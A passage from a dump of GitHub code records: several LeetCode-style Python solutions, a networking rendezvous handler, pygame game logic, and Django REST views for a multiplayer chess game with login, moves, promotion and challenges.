force=force)\n","repo_name":"kamikaze/dataset-format-benchmark","sub_path":"src/dataset_format_benchmark/datasets/kaggle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"4361992302","text":"# Time: O(n * k), k is the length of the common prefix\n# Space: O(1)\n\n\n# 编写一个函数来查找字符串数组中的最长公共前缀。\n# 如果不存在公共前缀,返回空字符串 \"\"\n# Example 1:\n# Input: [\"flower\",\"flow\",\"flight\"]\n# Output: \"fl\"\n\nclass Solution:\n # 执行用时为 60 ms 的范例\n def longestCommonPrefix_1(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if len(strs) < 1:\n return \"\"\n\n max_str = strs[0]\n max_len = len(max_str)\n for item in strs:\n if len(item) > max_len:\n max_len = len(item)\n max_str = item\n for item in strs:\n index = 0\n j = 0\n while j != len(item) and j != len(max_str):\n if item[index] == max_str[index]:\n index += 1\n j += 1\n max_str = max_str[:index]\n\n return max_str\n # 执行用时为 44 ms 的范例\n def longestCommonPrefix_2(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if len(strs) == 0:\n return ''\n\n if len(strs) == 1:\n return strs[0]\n\n # 只需要比较最大和最小的,\n # 只要a和b有共同前缀,其他中间的都有,只要a和b没有,其他的有也白瞎\n a = min(strs)\n b = max(strs)\n\n for i in range(len(a)):\n if a[i] != b[i]:\n return a[:i]\n return a\n","repo_name":"haitwang-cloud/leetCode_Python","sub_path":"longest-common-prefix.py","file_name":"longest-common-prefix.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5999720828","text":"import uuid\nimport logging\nfrom tandem.rendezvous.models.connection import Connection\nfrom tandem.rendezvous.stores.session import SessionStore\nfrom tandem.shared.models.peer import Peer\nfrom tandem.shared.protocol.handlers.addressed import AddressedHandler\nfrom tandem.shared.protocol.messages.rendezvous import (\n RendezvousProtocolMessageType,\n RendezvousProtocolUtils,\n SetupParameters,\n Error,\n)\nfrom tandem.shared.utils.static_value import static_value as staticvalue\n\n\ndef parse_uuid(candidate):\n try:\n return uuid.UUID(candidate)\n except ValueError:\n return None\n\n\nclass AgentRendezvousProtocolHandler(AddressedHandler):\n @staticvalue\n def _protocol_message_utils(self):\n return RendezvousProtocolUtils\n\n @staticvalue\n def _protocol_message_handlers(self):\n return {\n RendezvousProtocolMessageType.ConnectRequest.value:\n self._handle_connect_request,\n }\n\n def __init__(self, gateway):\n self._gateway = gateway\n\n def _handle_connect_request(self, message, sender_address):\n # Validate request identifiers\n connection_id = parse_uuid(message.my_id)\n session_id = parse_uuid(message.session_id)\n if connection_id is None or session_id is None:\n logging.info(\n \"Rejecting ConnectRequest from {}:{} due to malformed\"\n \" connection and/or session id.\"\n .format(*sender_address),\n )\n self._send_error_message(sender_address, \"Invalid ids.\")\n return\n\n # Fetch or create the session\n session = SessionStore.get_instance().get_or_create_session(session_id)\n\n # Make sure the agent requesting to join is new or has the same\n # \"identity\" as an agent already in the session.\n initiator = Connection(Peer(\n id=connection_id,\n public_address=sender_address,\n private_address=message.private_address,\n ))\n existing_connection = session.get_connection(connection_id)\n if existing_connection is None:\n session.add_connection(initiator)\n elif not(initiator == existing_connection):\n # Reject the connection request for security reasons since the\n # client gets to choose their ID. The first agent to join a\n # session \"claims\" the ID. This is not foolproof, but it makes\n # it more difficult for someone to join an existing session as\n # someone else.\n logging.info(\n \"Rejecting ConnectRequest from {}:{} due to existing\"\n \" connection with the same id.\"\n .format(*sender_address),\n )\n self._send_error_message(sender_address, \"Invalid session.\")\n return\n\n logging.info(\n \"Connection {} is joining session {} requested by {}:{}\".format(\n str(connection_id),\n str(session_id),\n *sender_address,\n ),\n )\n\n for member_connection in session.get_connections():\n if not(member_connection == initiator):\n # Send initiator's details to the session member\n self._send_setup_parameters_message(\n session_id=session_id,\n recipient=member_connection,\n should_connect_to=initiator,\n initiate=False,\n )\n\n # Send the session member's details to the initiator\n self._send_setup_parameters_message(\n session_id=session_id,\n recipient=initiator,\n should_connect_to=member_connection,\n initiate=True,\n )\n\n def _send_setup_parameters_message(\n self,\n session_id,\n recipient,\n should_connect_to,\n initiate,\n ):\n io_data = self._gateway.generate_io_data(\n self._protocol_message_utils().serialize(SetupParameters(\n session_id=str(session_id),\n peer_id=str(should_connect_to.get_peer().get_id()),\n initiate=initiate,\n public=should_connect_to.get_peer().get_public_address(),\n private=should_connect_to.get_peer().get_private_address(),\n )),\n recipient.get_peer().get_public_address(),\n )\n self._gateway.write_io_data(io_data)\n\n def _send_error_message(self, address, message):\n io_data = self._gateway.generate_io_data(\n self._protocol_message_utils().serialize(Error(\n message=message,\n )),\n address,\n )\n self._gateway.write_io_data(io_data)\n","repo_name":"typeintandem/tandem","sub_path":"rendezvous/tandem/rendezvous/protocol/handlers/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","stars":697,"dataset":"github-code","pt":"53"} +{"seq_id":"2207528303","text":"import sys\n\nimport pygame\nfrom bullet import Bullet \nfrom alien import Alien \nfrom time import sleep\n\n\ndef check_keydown_events(event,ai_settings, screen, ship, bullets):\n\t\"\"\"响应按键\"\"\"\n\tif event.key == pygame.K_RIGHT:\n\t\tship.moving_right = True\n\telif event.key == pygame.K_LEFT:\n\t\tship.moving_left = True\n\telif event.key == pygame.K_SPACE:\n\t\tfire_bullet(ai_settings, screen, ship, bullets)\n\telif event.key == pygame.K_q:\n\t\tsys.exit()\n\n\t\t\ndef fire_bullet(ai_settings, screen,ship,bullets):\n\t\"\"\"如果没有到达限制,就发射一颗子弹\"\"\"\n\t#创建新子弹,并将其加入编组bullets中\n\tif len(bullets) < ai_settings.bullet_allowed:\n\t\tnew_bullet = Bullet(ai_settings, screen, ship)\n\t\tbullets.add(new_bullet)\n\n\t\t\ndef check_keyup_events(event, ship):\n\t\"\"\"响应松开\"\"\"\n\tif event.key == pygame.K_RIGHT:\n\t\tship.moving_right = False\n\telif event.key == pygame.K_LEFT:\n\t\tship.moving_left = False\n\n\t\t\ndef check_events(ai_settings, screen, ship, bullets):\n\t\"\"\"响应按键和鼠标事件\"\"\"\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tsys.exit()\n\t\t\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tcheck_keydown_events(event,ai_settings, screen, ship, bullets)\n\t\t\n\t\telif event.type == pygame.KEYUP:\n\t\t\tcheck_keyup_events(event, ship)\n\n\t\t\t\t\t\t\ndef update_screen(ai_settings, screen,stats, ship,aliens, bullets):\n\t\"\"\"\"更新屏幕上的图像,并切换到新屏幕\"\"\"\n\t\n\t#每次循环时都会重新绘制屏幕\n\tscreen.fill(ai_settings.bg_color)\n\t\n\t#在飞船和外星人后面重绘所有子弹\n\tfor bullet in bullets.sprites():\n\t\tbullet.draw_bullet()\n\t\n\tship.blitme()\n\taliens.draw(screen)\n\t\n\t#如果游戏处于非活动状态, 就绘制Play按钮\n\t#if not stats.game_active:\n\t\t#play_button.draw_button()\n\t\t\n\t\t\n\t#让最近绘制的屏幕可见\n\tpygame.display.flip()\n\n\ndef check_bullet_alien_collisions(ai_settings, screen, ship, aliens, bullets):\n\t\"\"\"相应子弹和外星人的碰撞\"\"\"\n\t#删除发生碰撞的子弹和外星人\n\tcollections = pygame.sprite.groupcollide(bullets, aliens, True, True)\n\t\n\tif len(aliens) == 0:\n\t\tbullets.empty()\n\t\tai_settings.increase_speed()\n\t\tcreat_fleet(ai_settings, screen, ship, aliens)\n\t\"\"\"(要模拟能够穿行到屏幕顶端的高能子弹 —— 消灭它��中的每个外星人,\n\t 可将第一个布尔实参设置为 False ,并让第二个布尔实参为 True 。\n\t 这样被击中的外星人将消失,但所有的子弹都始终有效,直到抵达屏幕顶端后消失。)\"\"\"\n\t \n\t \t\ndef update_bullets(ai_settings, screen, ship, aliens, bullets):\n\t\"\"\"更新子弹位置,并删除已经消失的子弹\"\"\"\n\t#更新子弹位置\n\tbullets.update()\n\t\n\t\n\t#删除已消失子弹位置\n\tfor bullet in bullets.copy():\n\t\tif bullet.rect.bottom <= 0:\n\t\t\tbullets.remove(bullet)\n\t#print(len(bullets))\n\t#检查是否有子弹击中了外星人\n\t#如果是这样,就删除相应的子弹和外星人\n\tcheck_bullet_alien_collisions(ai_settings, screen, ship, aliens, bullets)\n\t\n\t\ndef get_number_aliens_x(ai_settings, alien_width):\n\t\"\"\"并计算一行可以容纳多少个外星人\"\"\"\n\tavailable_space_x = ai_settings.screen_width -2*alien_width\n\tnumber_aliens_x = int(available_space_x /(2*alien_width))\n\treturn number_aliens_x\n\n\ndef get_number_rows(ai_settings, ship_height, alien_height):\n\t\"\"\"计算屏幕可以容纳多少个外星人\"\"\"\n\tavailable_space_y = (ai_settings.screen_height - (3*alien_height)-ship_height)\n\tnumbers_rows = int(available_space_y /(2*alien_height))\n\treturn numbers_rows\n\n\t\ndef creat_alien(ai_settings, screen, aliens, alien_number, row_number):\n\t\"\"\"创建一个外星人并将其加入当前行\"\"\"\n\talien = Alien(ai_settings, screen)\n\talien_width = alien.rect.width\n\talien.x = alien_width + 2*alien_width*alien_number\n\talien.rect.x = alien.x\n\talien.rect.y = alien.rect.height + 2*alien.rect.height*row_number\n\taliens.add(alien)\n\n\t\ndef creat_fleet(ai_settings, screen, ship, aliens):\n\t\"\"\"创建外星人群\"\"\"\n\t#创建一个外星人,并计算一行可以容纳多少个外星人\n\talien = Alien(ai_settings, screen)\n\tnumber_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\n\tnumber_rows = get_number_rows(ai_settings, ship.rect.height,alien.rect.height)\n\t\n\t#创建第一行外星人\n\tfor row_number in range(number_rows):\n\t\tfor alien_number in range(number_aliens_x):\n\t\t\tcreat_alien(ai_settings, screen, aliens, alien_number, row_number)\n\n\ndef check_fleet_edges(ai_settings, aliens):\n\t\"\"\"有外星人到达边缘是采取相应措施\"\"\"\n\tfor alien in aliens.sprites():\n\t\tif alien.check_edges():\n\t\t\tchange_fleet_direction(ai_settings, aliens)\n\t\t\tbreak\n\n\ndef change_fleet_direction(ai_settings, aliens):\n\t\"\"\"将整群外星人下移,并改变他们的方向\"\"\"\n\tfor alien in aliens.sprites():\n\t\talien.rect.y += ai_settings.fleet_drop_speed\n\tai_settings.fleet_direction *= -1\n\n\ndef ship_hit(ai_settings, stats, screen, ship, aliens, bullets):\n\t\"\"\"相应被外星人撞到的飞船\"\"\"\n\tif stats.ships_left > 0:\n\t\t#将ship_left减1\n\t\tstats.ships_left -= 1\n\t\t\n\t\t#清空外星人列表和子弹列表\n\t\taliens.empty()\n\t\tbullets.empty()\n\t\t\n\t\t#创建一群新的外星人, 并将飞船放到屏幕低端中央\n\t\tcreat_fleet(ai_settings, screen, ship, aliens)\n\t\tship.center_ship()\n\t\t\n\t\t#暂停\n\t\tsleep(0.5)\n\t\n\telse:\n\t\tstats.game_active = False\n\t\t\n\n\ndef check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets):\n\t\"\"\"检查是否有外星人到达了屏幕底端\"\"\"\n\tscreen_rect = screen.get_rect()\n\tfor alien in aliens.sprites():\n\t\tif alien.rect.bottom >= screen_rect.bottom:\n\t\t\t#像飞船被撞到一样处理\n\t\t\tship_hit(ai_settings, stats, screen, ship, aliens, bullets)\n\t\t\tbreak\n\t\t\t\n\t\t\t\t\t\t\ndef update_aliens(ai_settings,stats, screen, ship, aliens, bullets):\n\t\"\"\"检查是否有外星人位于屏幕边缘, 更新外星人群中所有外星人的位置\"\"\"\n\tcheck_fleet_edges(ai_settings,aliens)\n\taliens.update()\n\t\n\t#检测外星人和飞船之间的碰撞\n\tif pygame.sprite.spritecollideany(ship, aliens):\n\t\tship_hit(ai_settings, stats, screen, ship, aliens, bullets)\n\t\n\t#检查是否有外星人到达屏幕底端\n\tcheck_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets)\n\t\n","repo_name":"heartangle/python","sub_path":"alien_game/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38705281583","text":"playlist = {\"title\": \"patagonia bus\",\n \"author\" : \"colt steele\",\n \"songs\": [\n {\"title\": \"song1\", \"artist\": [\"artist1\"], \"duration\": 2.5},\n {\"title\": \"song2\", \"artist\": [\"artist2\", \"dj cat\"], \"duration\": 5.25},\n {\"title\": \"nice song\", \"artist\": [\"various artist\"], \"duration\": 3.1}\n ]\n}\n\ntotal_length = 0\nfor song in playlist[\"songs\"]:\n total_length += song[\"duration\"]\nprint(total_length)\n","repo_name":"Lunchesque/udemy","sub_path":"fullpythontutorial/dictionaries/spotify_plalist_example.py","file_name":"spotify_plalist_example.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37645260117","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n \n dummy_head = ListNode(-1)\n dummy_head.next = head\n left = dummy_head\n right = dummy_head\n \n for _ in range(n):\n right = right.next\n \n while right.next:\n right = right.next\n left = left.next\n \n left.next = left.next.next\n \n return dummy_head.next","repo_name":"xixiaodanpaul/leetcode-summary-python","sub_path":"practice/solution/0019_remove_nth_node_from_end_of_list.py","file_name":"0019_remove_nth_node_from_end_of_list.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74238294248","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError, transaction\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\n# from django.views.decorators.csrf import csrf_exempt\n\n\nfrom rest_framework.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED, HTTP_500_INTERNAL_SERVER_ERROR\nfrom rest_framework.permissions import AllowAny # , IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\n# from django.contrib.auth.forms import AuthenticationForm\n\nfrom chess.models import GameModel, MoveModel, ChallengeModel\n\nfrom chess.serializers import GameModelSerializer\nfrom chess.board import IllegalMoveException, WrongPlayerException, InvlaidPieceException, \\\n EmptySquareException, PromotePieceException, IllegalPromotionException\n\nfrom chess.color import Color\nimport json\n\n\nclass ChessResponses(object):\n USER_IS_NOT_PLAYER = {\"error\": \"User is not a player of this game\"}\n USER_IS_NOT_CURRENT_PLAYER = {\"error\": \"User is not the current player of this game\"} # Change to you?\n USER_DOES_NOT_EXIST = {\"error\": \"User does not exist\"}\n OPPONENT_DOES_NOT_EXIST = {\"error\": \"Opponent does not exist\"}\n GAME_DOES_NOT_EXIST = {\"error\": \"Game does not exist\"}\n MOVE_NOT_ALLOWED = {\"error\": \"Move not allowed\"}\n PIECE_IS_NOT_VALID = {\"error\": \"Piece is not valid\"}\n SQUARE_IS_EMPTY = {\"error\": \"Square is empty\"}\n CANNOT_MOVE_ENEMY_PIECE = {\"error\": \"Cannot move enemy piece\"}\n PAWN_MUST_BE_PROMOTED = {\"error\": \"Cannot move piece, opponent must promote their pawn first\"}\n NO_PAWN_TO_PROMOTE = {\"error\": \"Cannot promote pawwn, there is no pawn able to be promoted\"}\n USER_CANNOT_CHALLENGE_THEMSELF = {\"errpr\": \"A player cannot challenge themself\"}\n NO_CHALLENGE_EXISTS = {\"error\": \"Cannot accept challenge with player, it does not exist\"}\n CHALLENGE_ALREADY_EXISTS = {\"error\": \"Challenge already exists, accept their challenge instead\"}\n\n\nclass AuthorizationResponses(object):\n LOGIN_SUCCESS = {\"message\": \"Login success\"}\n LOGOUT_SUCCESS = {\"message\": \"Logout success\"}\n LOGIN_FAILED = {\"error\": \"Login failed\"}\n USER_ALREADY_EXISTS = {\"error\": \"User already exists\"}\n USER_INACTIVE = {\"error\": \"User is inactive\"}\n USERNAME_REQUIRED = {\"error\": \"A username is required, but none was provided\"}\n PASSWORD_REQUIRED = {\"error\": \"A password is required, but none was provided\"}\n\n\n# Create your views here.\ndef index(request):\n template = loader.get_template(u'chess/index.html')\n context = RequestContext(request)\n return HttpResponse(template.render(context))\n\n\nclass LoginLogout(APIView):\n \"\"\"\n Allows a user to login and logout\n \"\"\"\n permission_classes = (AllowAny,)\n\n def post(self, request, do_logout=False):\n if do_logout:\n logout(request)\n return Response(AuthorizationResponses.LOGOUT_SUCCESS)\n else:\n data = json.loads(request.body)\n username = data.get(\"username\", None)\n password = data.get(\"password\", None)\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return Response(AuthorizationResponses.LOGIN_SUCCESS)\n\n return Response(AuthorizationResponses.LOGIN_FAILED, HTTP_401_UNAUTHORIZED)\n\n\nclass RegisterUser(APIView):\n permission_classes = (AllowAny,)\n\n def post(self, request):\n \"\"\"\n Create a new user account.\n\n The post data should be a json object containing the username and password, e.g\n {\n \"username\": \"me\",\n \"password\": \"secret\"\n }\n \"\"\"\n data = json.loads(request.body)\n\n username = data.get(\"username\", None)\n password = data.get(\"password\", None)\n\n if username is None:\n return Response(AuthorizationResponses.USERNAME_REQUIRED, HTTP_400_BAD_REQUEST)\n if password is None:\n return Response(AuthorizationResponses.PASSWORD_REQUIRED, HTTP_400_BAD_REQUEST)\n\n try:\n User.objects.create_user(username=username, password=password)\n except IntegrityError:\n # User already exists\n return Response(AuthorizationResponses.USER_ALREADY_EXISTS, HTTP_400_BAD_REQUEST)\n\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return Response(AuthorizationResponses.LOGIN_SUCCESS)\n else:\n # Should not happen because newly created uses should be active by default\n # TODO: Add logging\n return Response(AuthorizationResponses.USER_INACTIVE, HTTP_500_INTERNAL_SERVER_ERROR)\n else:\n # Should not happen because newly created uses should be active by default\n # TODO: Add logging\n return Response(AuthorizationResponses.LOGIN_FAILED, HTTP_500_INTERNAL_SERVER_ERROR)\n\n\nclass GameCreateOrList(APIView):\n \"\"\"This class provides methods to create new games or list those created by a user.\"\"\"\n permission_classes = (AllowAny, )\n\n def get(self, request, username, format=None):\n \"\"\"\n Retrieve a list of all Games for the user\n\n username -- The username of the player to create the game for\n\n Raises -- An HTTP 400 error if the user does not exist\n \"\"\"\n\n game_list = load_game_or_error(username)\n if isinstance(game_list, Response):\n return game_list\n\n serializer = GameModelSerializer(game_list, many=True)\n return Response(serializer.data)\n\n def post(self, request, username, format=None):\n \"\"\"\n Create a new game\n\n username -- The username of the player to create the game for\n\n Raises -- An HTTP 400 error if the user does not exist\n \"\"\"\n try:\n player = User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST, status=HTTP_400_BAD_REQUEST)\n\n game = GameModel.objects.create(white_player=player, black_player=player)\n # game.black_player = player\n # game.white_player = player\n # game.active_player.color = Color.WHITE\n # game.board = Board()\n # game.save()\n\n serializer = GameModelSerializer(game)\n return Response(serializer.data)\n\n\nclass GameDetail(APIView):\n \"\"\"Provides a method to retrieve a specific game.\"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id, format=None):\n \"\"\"\n Retrieve a game.\n\n username -- The username of the player to create the game for\n game_id -- The game to load\n Raises -- An HTTP 400 error if the user does not exist or the game does not exist\n Returns -- The game information\n \"\"\"\n\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n else:\n serializer = GameModelSerializer(game)\n return Response(serializer.data)\n\n\n# TODO: This should be changed just to load_game, and django should be configured to be able to raise exceptions into\n# a response. Currently we cannot break the contol flow easily from a child function call.\ndef load_game_or_error(username, game_id=None):\n \"\"\"\n Retrieve a game.\n\n username -- The username of the player to create the game for\n game_id -- The game to load\n\n Returns -- The game information or a Response with an HTTP status code explaining the problem.\n\n \"\"\"\n try:\n game_list = GameModel.objects.filter(\n Q(black_player__username=username) | Q(white_player__username=username)\n ).select_related('color', 'winner') # TODO: Remove?\n if game_id is None:\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST, status=HTTP_400_BAD_REQUEST)\n else:\n return game_list\n else:\n game = game_list.get(id=game_id)\n except GameModel.DoesNotExist:\n # Determine why the error happened. This doesn't have to be as performant because it is not the common case\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST, status=HTTP_400_BAD_REQUEST)\n else:\n try:\n GameModel.objects.get(id=game_id)\n except GameModel.DoesNotExist:\n return Response(ChessResponses.GAME_DOES_NOT_EXIST, status=HTTP_400_BAD_REQUEST)\n else:\n return Response(ChessResponses.USER_IS_NOT_PLAYER, status=HTTP_400_BAD_REQUEST)\n\n return game\n\n\ndef username_color(game, username):\n \"\"\"\n Returns the color that a player is playing as in a given game\n\n game -- The game to check\n username -- The players username\n \"\"\"\n if game.black_player.username == username:\n return Color.BLACK\n elif game.white_player.username == username:\n return Color.WHITE\n else:\n return None\n\n\ndef combine_moves_and_attacks(from_, moves, attacks):\n \"\"\"\n Combine, from_, moves, and attacks into a single object that can be more easily manipulated\n\n from_ -- The location of a piece (a string)\n moves -- The non-capturing moves that can be made by the peice at from_\n attacks -- The capturing moves that can be made by the peice at from_\n \"\"\"\n moves_and_attacks = []\n\n for x in moves:\n moves_and_attacks.append({\n \"square\": x,\n \"capture\": False\n })\n\n for x in attacks:\n moves_and_attacks.append({\n \"square\": x,\n \"capture\": True\n })\n return {\n \"from\": from_,\n \"to\": moves_and_attacks\n }\n\n\nclass MoveList(APIView):\n \"\"\"\n This view handles the moves that a player can make\n \"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id):\n \"\"\"\n Returns all the possible moves for all of the specified player's pieces.\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n\n If it is not the players turn, then the moves will be an empty list.\n \"\"\"\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n else:\n response = []\n\n if game.active_player(username):\n board = game.board\n for square in board.player_piece_squares(board.current_player):\n moves, attacks = board._get_moves_and_attacks(square)\n\n moves_and_attacks = combine_moves_and_attacks(square, moves, attacks)\n response.append(moves_and_attacks)\n\n return Response(response)\n\n\nclass MoveDetail(APIView):\n \"\"\"\n This view handles the moves a players chess piece.\n \"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id, from_loc, format=None):\n \"\"\"\n Retrieves all of the possible moves from a given location\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n from_loc -- The square to move the piece from, e.g 'A3'\n\n Raises -- An HTTP 400 error if the user does not exist or the game does not exist\n Returns -- The game information\n \"\"\"\n\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n else:\n board = game.board\n if board._piece_owned_by_current_player(from_loc):\n moves, attacks = board._get_moves_and_attacks(from_loc)\n else:\n moves = set([])\n attacks = set([])\n moves_and_attacks = combine_moves_and_attacks(from_loc, moves, attacks)\n return Response(moves_and_attacks)\n # else:\n # return Response(ChessResponses.USER_IS_NOT_CURRENT_PLAYER, status=HTTP_400_BAD_REQUEST)\n\n\nclass MovePiece(APIView):\n \"\"\"\n Handles the moving of pieces\n \"\"\"\n permission_classes = (AllowAny,)\n\n def post(self, request, username, game_id, from_loc, to_loc, format=None):\n u\"\"\"Move a piece from one square to another.\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n from_loc -- The square to move the piece from, e.g 'A3'\n to_loc -- The square to move the piece to, e.g 'A5'\n\n If it is not the players turn, then the game will not be updated\n \"\"\"\n\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n elif game.active_player(username):\n board = game.board\n else:\n return Response(ChessResponses.USER_IS_NOT_CURRENT_PLAYER, status=HTTP_400_BAD_REQUEST)\n\n try:\n board.move_piece(from_loc, to_loc)\n game.board = board\n\n except IllegalMoveException:\n return Response(ChessResponses.MOVE_NOT_ALLOWED, HTTP_400_BAD_REQUEST)\n except EmptySquareException:\n return Response(ChessResponses.SQUARE_IS_EMPTY, HTTP_400_BAD_REQUEST)\n except WrongPlayerException:\n return Response(ChessResponses.CANNOT_MOVE_ENEMY_PIECE, HTTP_400_BAD_REQUEST)\n except PromotePieceException:\n return Response(ChessResponses.PAWN_MUST_BE_PROMOTED, HTTP_400_BAD_REQUEST)\n\n serializer = GameModelSerializer(game)\n return Response(serializer.data)\n\n\nclass PromotablePieces(APIView):\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id, pk=None):\n \"\"\"\n Returns all the pieces that the pawn can be promoted to.\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n\n The color of the pieces is the same as that of the player with the username provided.\n \"\"\"\n\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n else:\n board = game.board\n player_color = game.player_color(username)\n assert(player_color is not None) # Should be guaranteed by load_game_or_error succeeding\n\n pieces = board.promotable_pieces(player_color)\n piece_names = [piece.__name__ for piece in pieces]\n return Response(piece_names)\n\n\nclass PromotePiece(APIView):\n permission_classes = (AllowAny,)\n\n def post(self, request, username, game_id, piece, format=None):\n u\"\"\"Move a piece from one square to another.\n\n username -- The username of the player\n game_id -- The game to list the possible moves for\n piece -- The piece to promote the pawn to\n\n If it is not the players turn, then the game will not be updated\n \"\"\"\n game = load_game_or_error(username, game_id)\n if isinstance(game, Response):\n return game\n elif game.active_player(username): # The common case\n board = game.board\n try:\n board.promote_pawn(piece) # TODO: The board method needs to be rewritten\n game.board = board\n except InvlaidPieceException:\n return Response(ChessResponses.PIECE_IS_NOT_VALID, HTTP_400_BAD_REQUEST)\n except IllegalPromotionException:\n return Response(ChessResponses.NO_PAWN_TO_PROMOTE, HTTP_400_BAD_REQUEST)\n\n serializer = GameModelSerializer(game)\n return Response(serializer.data)\n else:\n return Response(ChessResponses.USER_IS_NOT_CURRENT_PLAYER, status=HTTP_400_BAD_REQUEST)\n\n\nclass PreviousMoves(APIView):\n \"\"\"\n Lists all of the previous moves for a game\n \"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username, game_id):\n moves = MoveModel.objects.filter(game_id=game_id).all()\n\n resp = []\n for m in moves:\n if m.capture:\n operator = \"x\"\n else:\n operator = \" \"\n resp.append(m.from_loc + operator + m.to_loc)\n\n return Response(resp)\n\n\nclass ChallengeList(APIView):\n \"\"\"\n List all of the players challenging the player\n \"\"\"\n permission_classes = (AllowAny,)\n\n def get(self, request, username):\n \"\"\"\n List all of the players challenging the player, and players they are challenging.\n \"\"\"\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST, HTTP_400_BAD_REQUEST)\n\n incoming_challenges = ChallengeModel.objects.filter(challengee__username=username)\n challengers = [c.challenger.username for c in incoming_challenges]\n\n outgoing_challenges = ChallengeModel.objects.filter(challenger__username=username)\n challengees = [c.challengee.username for c in outgoing_challenges]\n\n resp = {\n \"challengers\": challengers,\n \"challengees\": challengees\n }\n return Response(resp)\n\n\nclass Challenge(APIView):\n \"\"\"\n Challenge players to a game or accept a challenge a challenge from other players\n \"\"\"\n permission_classes = (AllowAny,)\n\n def put(self, request, username, opponent):\n \"\"\"\n Challenge a player to a game.\n\n A player cannot challenge themselves\n \"\"\"\n if username != opponent:\n # First check if they have challenged us\n try:\n ChallengeModel.objects.get(challenger__username=opponent, challengee__username=username)\n except ChallengeModel.DoesNotExist:\n pass\n else:\n Response(ChessResponses.CHALLENGE_ALREADY_EXISTS)\n\n try:\n challenger = User.objects.get(username=username)\n except User.DoesNotExist:\n return Response(ChessResponses.USER_DOES_NOT_EXIST)\n\n try:\n challengee = User.objects.get(username=opponent)\n except User.DoesNotExist:\n return Response(ChessResponses.OPPONENT_DOES_NOT_EXIST)\n\n try:\n ChallengeModel.objects.create(challenger=challenger, challengee=challengee)\n except IntegrityError:\n # Challenge already exists\n pass\n\n resp = {\n \"message\": \"Challenge issued to opponent\"\n }\n\n return Response(resp)\n else:\n return Response(ChessResponses.USER_CANNOT_CHALLENGE_THEMSELF)\n\n def delete(self, request, username, opponent):\n \"\"\"\n Cancel a challenge\n \"\"\"\n try:\n ChallengeModel.objects.filter(challenger__username=username, challengee__username=opponent).delete()\n ChallengeModel.objects.filter(challenger__username=opponent, challengee__username=username).delete()\n except IntegrityError:\n # Challenge already exists, do nothing\n pass\n else:\n resp = {\n \"message\": \"Challenge deleted.\"\n }\n return Response(resp)\n\n def post(self, request, username, opponent):\n \"\"\"\n Accept a challenge\n \"\"\"\n try:\n challenge = ChallengeModel.objects.get(challenger__username=username, challengee__username=opponent)\n except ChallengeModel.DoesNotExist:\n return Response(ChessResponses.NO_CHALLENGE_EXISTS, HTTP_400_BAD_REQUEST)\n else:\n with transaction.atomic():\n challenge.delete()\n GameModel.objects.create_game(username, opponent)\n\n # TODO: need to place a message to alert the other player that the game has started!\n return Response(\"TODO:\")\n\n\nclass MatchMake(APIView):\n pass\n\n\nclass ActivePlayers(APIView):\n permission_classes = (AllowAny,)\n\n def get(self, request, username):\n \"\"\"\n Return a list of active players excluding the current_player\n \"\"\"\n # TODO: Currently returns all players\n users = User.objects.filter(~Q(username=username)).all()\n resp = [u.username for u in users]\n\n return Response(resp)\n\n def post(self, request, username):\n \"\"\"\n Add the player to the list of active players.\n\n The active players is periodically reset, with inactive players delete\n \"\"\"\n 